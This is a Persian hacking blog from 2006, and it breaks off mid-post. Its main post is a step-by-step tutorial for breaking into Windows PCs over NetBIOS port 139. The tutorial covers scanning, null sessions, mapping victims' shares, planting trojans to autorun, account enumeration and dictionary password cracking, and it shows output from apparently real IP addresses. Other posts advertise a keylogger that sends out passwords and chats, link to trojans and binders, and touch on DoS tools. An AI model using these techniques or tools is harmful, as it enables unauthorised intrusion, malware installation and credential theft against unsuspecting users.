هک . بوت . ویروس . امنیت آقا کسی یا چیزی رو هک نمی کنم . اینقدر پی ام نده.

درباره وبلاگ سعی ما جلب رضایت شماست(مدیران وبلاگ) منوي اصلي صفحه نخست پست الکترونيک آرشيو وبلاگ خانگي سازي ذخيره كردن صفحه اضافه به علاقه منديها جستجو در وبلاگ نويسندگان مدير وبلاگ سناتور امیر همكاران سناتور امیر skull آرشيو آبان 1385 مهر 1385 شهریور 1385 خرداد 1385 اردیبهشت 1385 فروردین 1385 آرشيو کامل پیوندها لينکستان تالار اختصاصي وبلاگ Musucker+ Magic PS v1.5se MagicPsv1.5 se ++ Magic Loginfull++ Magic-Dialup-Proxy-12 MagicBinder-VB-Lib ExeBinder Tntjoiner k2ps032 evillhttp.zip WinShell5.0|zip Netsender Behzad PS 1.8 Magic PS v1.5se Smart PS v1.3 Behzad PS V1.7 Y!Tunnl Pro 234 S H YAHOO Ps exe evil v1.0 Jpegd-web downloader Stealth tools Exe joiner Trojan Remover Nice Trojan Snake Trojan Barok2 FC Exe Joiner SH DIAL UP Sender Anti blaster لوگوي دوستان در حال جمع آوری آمار وبلاگ افراد آنلاين: تعداد بازديدها: دوستان هک بوت ویروس امنیت کاخ تنهايي من شب های سفید تنهایی Beauty Star شب گرد ملوسr الهه شرقی غروب پاییز امپراتور شیدا بارونی پسری در آغوش پاییز عطر گل یخ شیدی جغله زاپاتا افسانه باران عشق نافرجام دختر آسمون آنتی پسرهای لوس اسمون تک ستاره (غم پنهان(سارا اگه یه وبلاگ یا سایت عشقولانه داری بگو تا همین بالا بزارمش

خوب دوستان علي رغم ميل باطني ام ، با توجه به نظرات شما عزيزان و در خواست هاي مكرر شما اقدام به تاسيس سايت كردم http://www.P30IT.com نوشته شده در شنبه ششم آبان 1385 ساعت 12:3 بعد از ظهر توسط skull [ ] | مطالب مرتبط ( ) | لينک ثابت بنا به درخواست رکسانا ای دیشو برگردوندم و یه پسوورد جدید براش گذاشتم.ولی به علت بی معرفتی دادم به یکی از بچه ها البته اددلیستشو دارم نوشته شده در پنجشنبه سیزدهم مهر 1385 ساعت 10:6 قبل از ظهر توسط skull [ ] | مطالب مرتبط ( ) | لينک ثابت فعلا قالب وبلاگ یه کم به هم ریخته ولی سرعتش از اون یکی بیشتره به زودی درست میشه در ضمن  بهتره که از فایر فوکس استفاده کنید نوشته شده در شنبه هشتم مهر 1385 ساعت 11:15 بعد از ظهر توسط skull [ ] | مطالب مرتبط ( ) | لينک ثابت یه آموزش خیلی توپ که نمونه اش رو پیدا نمی کنید ـ چگونه با پورت 139 صحبت كنيم ؟ ۱- اولين کاري که مي‌کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي‌کنيم تا ip هايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام مي‌دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم: Interesting ports on HOME-TU6U0AV86Y (217.218.84.29): Port State Service 139/tcp open netbios-ssn Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP اين خروجي اعلام مي‌کند که پورت ۱۳۹ باز است. پس مي‌شود از اين ip استفاده کرد. ۲- حالا مي‌خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق مي‌کند. کامنت پرامت را باز کرده و دستور زير را مي‌نويسم: nbtstat -A 217.218.84.29 دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر‌هاي بسياري است که اگه مي‌خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.) حالا بحث اينه که اين دستور چه‌ کاري مي‌کنه و خروجي به چه صورتي است: اين دستور به ip مورد نظر وصل مي‌شه و از اون مي‌خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته: الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نمي‌تونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست. ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- HOME-TU6U0AV86Y<00> UNIQUE Registered MSHOME <00> GROUP Registered HOME-TU6U0AV86Y<20> UNIQUE Registered MSHOME <1E> GROUP Registered MAC Address = 00-53-45-00-00-00 ۳- در اين نتايج چيزي که به درد مي‌خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي‌تونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بي‌خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه مي‌دهيم. حالا مي‌نويسم: net view 217.218.84.29 حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته: الف) پيغام بياد System error 5 has occurred. Access is denied. اين يعني نمي‌تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي‌تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز‌هاي سري NT جواب ميده. مي‌نويسيد: net use 217.218.84.29IPC$ "" /user:"" حالا چرا مي‌گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد مي‌تونم دوباره دستور net view 217.218.84.29 را تکرار کنم. ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده: Shared resources at 217.218.84.29 Share name Type Used as Comment ------------------------------------------------ Printer Print Acrobat PDFWriter Printer2 Print Acrobat Distiller SharedDocs Disk The command completed successfully. عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي‌نويسم. ۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي‌دونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي‌کنيد، يک سري آيکون مي‌بينيد که هر کدام اسمي‌ دارند. مثلا :A براي فلاپي و و و تا مي‌رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين‌کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي‌کنم و دستور زير را مي‌نويسم: net use L: 217.218.84.29SharedDocs به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط مي‌گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي‌شنوم: The command completed successfully. معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي‌تونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ... ۵- وقتي کار تموم شد مي‌تونيد درايو رو حذف کنيد. براي اينکار مي‌تونين روي درايو رايت‌کليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور net use /delete L: استفاده کنيد.   ـ نكته تكنه !! ۱- يه روش جالب به جاي مرحله ۴ در بالا اينه که مثلا در مرورگر يا در run بنويسيد 217.218.84.29 که ip داراي اشتراک است و يا اينکه تايپ کنيد SharedDocsت217.218.84.29 که اصولا بايد جواب بده ( ولي من خودم تست نکردم اينو ). ۲- من دارم به صورت استاندارد کار مي‌کنم. بعدا خواهم گفت که چطوري مي‌تونيم وقتي تو بعضي از مراحل متوقف مي‌شيم، اونو دور بزنيم. ۳- NetBIOS فقط براي کلاينت‌ها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت. ۴- اگه داريد يک کلاينت رو هک مي‌کنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم شده باشه. ۵- روش‌هاي ديگري هم براي کار با NetBIOS هست که يکي از اون روش‌ها استفاده از يک سري نرم‌افزارهاي خاص است که تو درس بعدي توضيح مي‌دم و نيز يک روش ديگه اعمال تغييرات در فايل‌هاي HOST و LMHOST و استفاده از find در سيستم‌عامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست. ۶- براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرف مقابل بايد فعال باشه، روي کامپيوتر خودمون هم فعال باشه. چون در حالت پيش‌فرض در کامپيوتر فعال است، معمولا مشکلي نيست.  ـ چگونه NetBios رو روي كامپيوتر خودمون فعال كنيم ؟ براي غيرفعال کردن NetBIOS در ويندوز با توجه به نوع آن ويندوز روش‌هاي مختلفي هست. جدول پاييني براي همين موضوع طراحي شده است: Win 2000 Win XP Home Win XP Professional Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok   Start > Programs > Administrative Tools > Local Security Settings > Local Policies > 1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled 2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2 مي‌تونيد به کمک فايروال يا روتر پورت‌هاي زير را ببنديد: 135 TCP DCE/RPC Portmapper 137 TCP/UDP NetBIOS Name Service 138 TCP/UDP NetBIOS Datagram Service 139 TCP NetBIOS Session Service 445 TCP Microsoft-DS (Windows 2000 CIFS/SMB) ۱- وقتي پورت ۱۳۹ رو مي‌بنديد، ديگه نمي‌تونيد از NetBIOS استفاده کنيد ( مگر اينکه دوباره پورت رو به صورت فعال در‌ آوريد). پس وقتي که کسي رو مي‌خواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعال کنيد. ۲- مي‌بينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد. ۳- اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يک از روش‌هاي بالا، گزينه‌اي که مخالف گزينه ذکر شده در جدول است رو انتخاب کنيد، مثلا اگه در جدول Enabled را نوشته‌ايم، شما Disable را انتخاب کنيد. ـ چگونه از اين امكانات به اشتراك گذاشته شدهبراي اجراي يك ترجان استفاده كنيم خوب ما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي مي‌کنم تو يکي از درس‌هاي آينده اونو توضيح بدم. ما اينجا مي‌خواهيم از تروجان در رابطه با پورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟ تروجان به‌طور ساده برنامه‌اي اجرايي است، که ما براي طرف مقابل مي‌فرستيم و اگه طرف مقابل اونو اجرا کنه، ما مي‌تونيم کنترل سيستم‌ اونو به دست بياريم. تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح مي‌دم. حالا همان بحث تروجان ولي در رابطه با پورت ۱۳۹ : روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز Share کنم. حالا فايل تروجان ( سرور تروجان ) را upload مي‌کنم به اون کامپيوتر و اسمي براش انتخاب مي‌کنم که طرف مقابل رو به اجراي فايل تشويق کنه. يک اشتباهي که بعضي‌ها مي‌کنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر مي‌آد و فايل رو دابل کليک مي‌کنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي‌شه نه کامپيوتر قرباني. پس ما فقط فايل رو مي‌فرستيم و منتظر مي‌مونيم که طرف مقابل اجرا کنه. حالا چند روش رو مطرح مي‌کنم که در شرايط خاص حالتي رو ايجاد مي‌کنه که نيازي با دابل‌کليک توسط قرباني نباشد: ۱- اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.bat اضافه کنيد که نام و مسير فايل اجرايي را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد و در مسير d: ewfolder باشد، سطري که اضافه مي‌کنيم به صورت زير است: d: ewfolderali.exe در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد. ۲- اگه به درايو C دسترسي داريد، مي‌تونيد فايلي به اسم Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد ( سطر آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اون تغيير دهيد) : [autorun] open=d: ewfolderali.exe ۳- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجرا خواهد شد. ۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد: run=d: ewfolderali.exe ۵- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد تروجان رو به فولدر Start MenuStartup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگري نيست. ـ ابزارهاي كمكي : 1.ابزارهاي خط فرماني ۱- enum : اين برنامه را از اينجا داون‌لود کنيد. enum نرم‌افزاري با قابليت‌هاي فوق‌العاده است. از جمله توانايي‌هايي که دارد، در مواردي است که کامپيوتر طرف مقابل براي اعمال sharing از ما پسورد بخواد. در اين موارد مي‌تونيم به کمک enum و ليستي از پسوردهايي که در يک فايل ذخيره شده، تعداد زيادي پسورد رو چک کنيم ( اصطلاحا cracking ) و شايد به نتيجه برسيم. ( اين موضوع را بعدا بيشتر توضيح مب‌دم) کاربردي که الان مد نظر ماست، پيدا کردن ليست share هايي است که کامپيوتر مقابل براي ما باز گذاشته است. مثلا من دستور زير را تايپ کردم، تا ليست اشتراک‌هاي آن ip خاص در آن لحظه رو بدست بيارم: enum -S 217.218.84.29 و جواب شنيدم: server: 217.218.84.29 setting up session... success. enumerating shares (pass 1)... got 10 shares, 0 left: E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer cleaning up... success. ملاحظه مي‌فرماييد که درايو‌هاي E و D و F و C و نيز SharedDocs و ... ليست شده است. بقيه مراحل مثل درس ۲۱ است. (دقت کنيد که در اين حالت نيازي به null session نيست ). ۲- nbtscan : اين برنامه را از اينجا داون‌لود کنيد. اين برنامه دقيقا معادل nbtstat است ولي با اين تفاوت که مي‌تونه تعداد زيادي ip رو همزمان تست کنه و ليست share ها رو بدست بياره. اين دقيقا راه‌حلي است براي سوالي که خيلي از شما دوستان پرسيده بودين. مثلا اگه بنويسم: nbtscan -v -s : 195.219.49.0-30 که ليست اشتراک‌ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب مي‌شنوم: 195.219.49.1 Recvfrom failed: Connection reset by peer 195.219.49.5 Recvfrom failed: Connection reset by peer 195.219.49.6 Recvfrom failed: Connection reset by peer 195.219.49.7 Recvfrom failed: Connection reset by peer 195.219.49.8 Recvfrom failed: Connection reset by peer 195.219.49.12 Recvfrom failed: Connection reset by peer 195.219.49.23:MRS.ZADE :00U 195.219.49.23:ATINET_MRA :00G 195.219.49.23:MRS.ZADE :03U 195.219.49.23:MAC:44-45-53-54-00-00 195.219.49.28:MAC:44-45-53-54-00-00 195.219.49.26:KIYARASH-R96L0K:00U 195.219.49.26:KIYARASH-R96L0K:20U 195.219.49.26:WORKGROUP :00G 195.219.49.26:WORKGROUP :1eG 195.219.49.26:MAC:00-53-45-00-00-00 195.219.49.22:FARHANG-ZCT780D:00U 195.219.49.22:FARHANG-ZCT780D:20U 195.219.49.22:WORKGROUP :00G 195.219.49.22:WORKGROUP :1eG 195.219.49.22:MAC:00-53-45-00-00-00 195.219.49.29:TESSA :00U 195.219.49.29:WORKGROUP :00G 195.219.49.29:TESSA :03U 195.219.49.29:MAC:44-45-53-54-00-00 195.219.49.25:MAC:44-45-53-54-00-00 در مورد ip هايي که 20U را مي‌بينيد، يعني sharing رو ميشه استفاده کرد. ۳- winfo : اينم از جمله برنامه‌هايي است که بايد بگم آخر برنامه است!! از اينجا داون‌لود کنيد. البته توانايي تست تعداد زيادي ip رو نداره ولي وقتي يه ip رو تست مي‌کنه همه‌چي شو در رو مي‌کنه. (البته ميشه گفت همه اين کارها رو مي‌شه با enum هم انجام داد ). مثلا من دستور زير را تايپ کردم : winfo 195.219.49.184 -n -v و به نتايج زير رسيدم: Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom - http://www.ntsecurity.nu/toolbox/winfo/ Trying to establish null session... Null session established. SYSTEM INFORMATION: - OS version: 4.0 DOMAIN INFORMATION: - Primary domain (legacy): DSG - Account domain: TEHRAN Warning: Unable to retrieve domain DNS information. Reason : Not supported by the remote OS. PASSWORD POLICY: - Time between end of logon time and forced logoff: No forced logoff - Maximum password age: 42 days - Minimum password age: 0 days - Password history length: 0 passwords - Minimum password length: 0 characters LOCOUT POLICY: - Lockout duration: 30 minutes - Reset lockout counter after 30 minutes - Lockout threshold: 0 SESSIONS: - Computer: ARTAWILL-V0P1QR - User: LOGGED IN USERS: * Administrator USER ACCOUNTS: * Administrator - Password age: 666 days - Privilege level: Administrator - Home directory: - Home directory mapped as: - Comment: Built-in account for administering the computer/domain - Account is: Enabled - User can change password: Yes - Account is locked out: No - Password never expires: Yes - The account is: Normal user - Logon script path: - Full name: - User comment: - Can log in from workstations: All - Last logon to this DC / computer: Mon Mar 03 23:10:23 2003 - Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001 - Account expires: Never - Max disk space: Unlimited - Failed logins in a row to this DC / computer: 0 - Path to user profile: - Password has expired: No (This account is the built-in administrator account) * Guest - Password age: 680 days - Privilege level: Guest - Home directory: - Home directory mapped as: - Comment: Built-in account for guest access to the computer/domain - Account is: Disabled - User can change password: No - Account is locked out: No - Password never expires: Yes - The account is: Normal user - Logon script path: - Full name: - User comment: - Can log in from workstations: All - Last logon to this DC / computer: None - Last logon to this DC / computer: None - Account expires: Never - Max disk space: Unlimited - Failed logins in a row to this DC / computer: 0 - Path to user profile: - Password has expired: No (This account is the built-in guest account) * TEST - Password age: 680 days - Privilege level: User - Home directory: - Home directory mapped as: - Comment: - Account is: Enabled - User can change password: Yes - Account is locked out: No - Password never expires: No - The account is: Normal user - Logon script path: - Full name: - User comment: - Can log in from workstations: All - Last logon to this DC / computer: None - Last logon to this DC / computer: None - Account expires: Never - Max disk space: Unlimited - Failed logins in a row to this DC / computer: 0 - Path to user profile: - Password has expired: Yes WORKSTATION TRUST ACCOUNTS: INTERDOMAIN TRUST ACCOUNTS: SERVER TRUST ACCOUNTS: SHARES: * ADMIN$ - Type: Special share reserved for IPC or administrative share - Remark: Remote Admin * IPC$ - Type: Unknown - Remark: Remote IPC * C$ - Type: Special share reserved for IPC or administrative share - Remark: Default share بعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها مي‌تونين، share ها رو ببينيد. ۴- NAT : اين برنامه را از اينجا داون‌لود کنيد. يکي از مهم‌ترين کاربرد‌هاي اون crack کردن پسورد sharing است ( مثل enum ). براي کار با NAT کافي است، بنويسيد nat و بعد يک فاصله و بعد ip را مي‌نويسيم. حتما تست کنيد و نتيجه رو ببينيد... ( تکليف براي خودتون ) ۵- و ... ـ ابزارهاي كمكي : 2.ابزارهاي گرافيكي ۱- netbrute : اين برنامه را از اينجا داون‌لود کنيد. من از بين ابزارهاي گرافيکي اينو توصيه مي‌کنم اگرچه به اندازه دو نرم‌افزار بعدي مشهور نيست. من نمي‌خوام روش کار با اينو توضيح بدم چون خيلي تابلو‌ ه! ضمنا اين نرم‌افزار داخل خودش يک پورت اسکنر هم داره که خيلي به درد مي‌خوره. حتما حتما حتما داون‌لود کنيد اينو و اونقدر انگولکش کنيد که سر در بيارين ازش. قرار نيست که همي‌چي رو من بهتون بگم !! ۲- Legion : اگه بگم مشهورترين نرم‌افزار اسکن کردن پورت‌ ۱۳۹ اين نرم‌افزاره، سخن گزافي نيست!! خيلي‌ها کشته مرده اون هستن ولي من زياد ازش خوشم نمي‌آد. اما بايد قبول کرد که کارش واقعا عاليه!!! به هر حال اگه خواستين داول‌لود کنيد، اينجا رو کليک کنيد. ۳- DumpSec يا DumpACL : اين هم خيلي معروفه. اگه خواستين مي‌تونين از اينجا داون‌لود کنيد. ـ آيا چيزي راجه به اين پورتها مونده كه بحث نشده باشه ؟ بله! ۱- يه نرم‌افزاري هست به اسم pqwak که اين‌طوري که مي‌گن، اگه کامپيوتر مقابل ويندوز ۹۸ باشه، مي‌تونه پسورد اونو سه سوت در بياره. ( اين برنامه از نقطه ضعف ويندوز ۹۸ راجع به netbios استفاده مي‌کنه و اونو exploit مي‌کنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاينت، پس نبايد زياد به درد ما بخوره ( توجه کنيد که ويندوز ۹۸ تو کار کلاينت‌اش هم مونده، چه برسه به اينکه سرور باشه! ). خودتون بگردين و اونو اگه مي‌خواين پيدا کنيد. ۲- ما بحث استفاده از نقاط ضعف پورت‌ها رو هنوز شروع نکرده‌ايم و در مورد پورت ۱۳۹ هم همينطوره. به عنوان مثال روش‌هايي هست که پورت ۱۳۹ رو exploit کنيم و اون مراحلي که توش گير مي‌کرديم رو دور بزنيم. _ نكاتي راجه به enum خوب قبلا گفتم که enum نرم‌افزار بسيار مهمي در ارتباط با پورت ۱۳۹ است. حالا مي‌خوام دو کاربرد خاص از اونو براتون توضيح بدم: ۱- گرفتن password policy information : در ويندوزهاي NT مي‌شود يک سري پارامتر رو براي پسوردها ست کرد. مثلا اينکه حداقل طول پسورد و حداکثر اون چقدر باشه و ... براي اينکه اين policy رو بدست بياريد، از سويچ P استفاده مي‌کنيم. مثلا مي‌نويسيم: enum -P xxx.xxx.xxx.xxx و جواب مي‌شنوم: server: xxx.xxx.xxx.xxx setting up session... success. password policy: min length: none min age: none max age: 42 days lockout threshold: none lockout duration: 30 mins lockout reset: 30 mins cleaning up... success. خودتون که دارين مي‌بينين! ۲- استفاده از روش cracking براي پيدا کردن پسورد: اگه با NetBIOS کار کرده باشيد، حتما ديديد که بعضي وقت‌ها (خصوصا در مورد سرورها) پسورد از ما سوال ميشه. (پسورد وقتي پرسيده ميشه که بخواهيم، مرحله ۴ رو از بالا انجام بديم). وقتي پسورد نداشته باشيد، کاري نمي‌تونيد بکنيد. پس ما کاري که مي‌کنيم، اينه که يک سري پسورد را توسط enum تست مي‌کنيم که يکي جواب بده - يا اينکه نده ! اصولا تست کردن تعداد زيادي پسورد براي پيدا کردن پسورد درست رو crack کردن پسورد به روش brute force يا bf مي‌گن ( اين bf رو با اون bf اشتباه نگيريد!! ). البته استفاده از روش bf مختص NetBIOS نيست و خيلي جاها استفاده ميشه. اينم بگم که استفاده از روش bf يه کمي کلاس کار شما رو به عنوان هکر پايين مياره... حالا چيري مي‌خوايم، يک فايل بزرگ از پسوردهايي است که معمولا مردم استفاده مي‌کنن. براي پيدا کردن اين فايل‌ها که اصطلاحا dictionary file ناميده مي‌شوند به صورت زير است: الف) استفاده از ديکشنري‌هاي آماده مثل The Argon که مشهورترين ديکشنري کرکينگ مي‌باشد با حجمي حدود ۲۴ مگابايت! ب) بعضي وقت‌ها خودمون مي‌خواهيم يه ديکشنري بسازيم، در اين موارد کاري که مي‌کنيم اينه که از نرم‌افزارهاي سازنده ديکشنري استفاده مي‌کنيم. مثلا وقتي که شما مي‌دونيد که فلاني از پسوردهاي ۸ حرفي استفاده مي‌کنه و ... براي اين‌کار نرم‌افزارهاي زيادي هست که چند نمونه مهمش عبارتند از: DCM 2.0 و DICTIONARY MAKER و PASSLIST.TXT GENERATOR و ... حالا که يه فايل ديکشنري دارم مي‌تونم کار کرک پسورد NetBIOS رو شروع کنم. فرض کنيد که وقتي مي‌خوام Ali رو در يک ip به شماره xxx.xxx.xxx.xxx رو با يک فايل ديکشنري به اسم theargon.lst کرک کنيم. دستوري که براي اين‌کار استفاده مي‌کنيم، اينه: enum -D -f "theargon.lst" -u "Adel" xxx.xxx.xxx.xxx حالا enum مياد و تمام پسوردها رو تست مي‌کنه تا ايشالله به جواب برسه! اينقدر که از enum تعريف کردم ديگه بسه! مشکلي که enum راجع به کرک پسورد داره اينه که خيلي کند کار ميکنه. ممکنه ساعت‌ها وقت لازم باشه. راه‌حل چيه؟ نوشته شده در شنبه هجدهم شهریور 1385 ساعت 11:14 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت يافتن mail server هاي ISP 1 . می توانید با ISP خود تماس بگیرید و از آنها آدرس IP یا hostname  راکه برای      mail server خروجی تان استفاده می شود بپرسید ( این در واقع همان IP یا hostname ای است که شما از آن برای بکار بردن نیرنگهایتان از آن استفاده می کنید  ) . شما می توانید با ISP خود با شماره تلفن هایی که بعنوان support مشخص شده اند تماس حاصل نمایید . اما اگر هم به هر علتی نتوانستید این کار را بکنید می توانید از روش سوم استفاده کنید .  2 . سرویس گیرندة پستی (Mail Client) خود را آغاز کنید ، به صفحة preferences خود بروید و در آنجا به دنبال فیلد outgoing mail یا فیلد SMTP Server خود بگردید ( اینها هر دو یکی هستند . SMTP سر نامِ کلمه های Simple Mail Transfer Protocol به معنای پروتکل انتقال بسته های پستی ساده می باشد که برای فرستادن Email ها در طول اینترنت استفاده می شود) . 3 . حدس بزنید . اگر server هدف شما باشد ، mail server آنها باید mailgw.someone.com:25 ( یعنی mailgw.someone.com روی پورت 25 . gw مخفف gateway به معنای دروازه یا درگاه می باشد. ) ویا همان someone.com:25 باشد . اگر اینطور نبود یک Email به آدرس admin@someone.com  یا support@someone.com و یا info@someone.com بفرستید و از خود آنها آدرس mail server را بپرسید . ( ضمن اینکه انها باید خیلی خوشحال باشند از اینکه آدرس mail server خود را به شما می دهند . ) توجه : هیچ server ی روی زمین نیست که mail server خروجی نداشته باشد . ـ DOS Attack (Denial OF Service) : حملة DOS به عنوان یک Nuke یا Newk شناخته می شود . حملةDOS جزء انواع حمله هایی است که باعث می شود تا کامپیوتر هدف بعضی از ویا همة service های کاربران آن کامپیوتر(کاربران محلی و شبکه ای) را انکار کند . بعنوان مثال : برنامة winnuke ( که نام دیگر آن OOB می باشد ) نمونه ترین ابزار DOS در جهان می باشد .  ـ Unix Password Files : هر سیستم عامل Unix یک فایل password دارد . فایلهای password شامل لیست کاربران ، password هایشان و بعضی اطلاعات مهم دربارة آنها می باشد . فایل password در مسیر /etc/passwd قرار داده شده است . هر سطر در این فایل برای یک user ارائه شده است . هر سطر شامل 7 بخش مجزا است که با کاما ( , ) یا colon ( : ) از هم جدا شده اند . یک سطر از فایل password باید شبیه زیر باشد : Username:encrypted password:UID:GID:short descriptin:home directory:shell User name ـ  نام کاربری کاربران می باشد . Encrypted password ـ password کاربران میباشد که برای امنیت بالا پنهانی (encrypted) شده است . یک encrypted password همیشه 13 کاراکتر (character) دارد.  UID (User Identifier) ـ هر کاربری یک شمارة شناسایی (ID Number) دارد . اگر UID شما 0 باشد این بدان معنی است که شما دسترسی کاربر Root را دارید .  GID (Group Identifier) ـ شما می توانید گروه هایی را دسته بندی کنید ( برای مثال : تمامی کارکنان در بخش حسابداری مس توانند یک گروه را تشکیل دهند. ) و دسترسی های مخصوصی را برای این گروه کامل تعیین نمایید . GID کاربر Root نیز 0 می باشد . Short Description (توصیف کوتاه) ـ شرح کوتاهی دربارة زبان (language) انسان   می باشد . Home Directory ـ یک directory که همة فایلهای پیکربندی شخصی کاربران در آنجا قرار دارد .  Shell ـ برنامه ایست که هر گاه کاربری login می کند اجرا می شود . در بیشتر حالت ها shell یک command interpreter می باشد . در حالتی که ما مورد بررسی قرار می دهیم ، فیلد encrypted password خالی است . این بدین معنا است که این user برای وارد شدن تنها username خود را وارد می کند . که ای ن حالت می تواند توسط کاربر Root می تواند تعویض شود . یعنی کاربر Root توانایی هر تغییری اعم از تغییر password را برای هر کاربری که بخواهد دارد . در Unix اگر شما از کاراکترهای / 0-9 a-z A-Z استفاده نکنید ویا در قسمت username چیزی پر نکنید ، account شما غیر فعال خواهد بود بنابراین user نمی تواند وارد شود  . نوشته شده در شنبه هجدهم شهریور 1385 ساعت 11:9 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت ayosoft .  اینم به سفارش دوست خوبمون محسن   ارسال پسورد ايميل, مسنجر و... ارسال متون چت + کليه متوني که کاربر تايپ ميکند ارسال آدرس سايت هايي که کاربر بازديد ميکند ارسال IP Address و نوع مرورگر و سيستم عامل ارسال محتويات کليپ برد ( Clipboard ) امکان چسپاندن تصاوير و يا فايلهاي اجرايي به سرور برنامه امکان محدود کردن گزارش گيري ( مثلا فقط متون چت و پسورد مسنجر ارسال بشه ) و.... براي داونلود برنامه اينجا کليک کنيد ( حجم فايل : ‌ 483کيلوبايت ) نوشته شده در شنبه هجدهم شهریور 1385 ساعت 10:55 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت در ورژنهای قبلی یاهو مسنجر امکانی وجود داشت که با استفاده از آن میتوانستید بفمهمید که دوست شما در کدام یک از چت روم های یاهو حاضر است. این قابلیت در ورژنهای بعدی از یاهو مسنجر حذف شد. همینک قصد داریم یک ترفند جدید را به شما معرفی کنیم که با استفاده از آن میتوانید به سادگی پی ببرید که ID مورد نظر شما در سایت یاهو در کدام روم مشغول چت کردن است. بدین منظور: وارد یاهو مسنجر شوید و به آیدی خودتان لوگین کنید. سپس از منوی بالا وارد Messenger شده و از قسمت Yahoo Chat بر روی Join a Room کلیک کنید. اکنون به انتخاب خودتون به 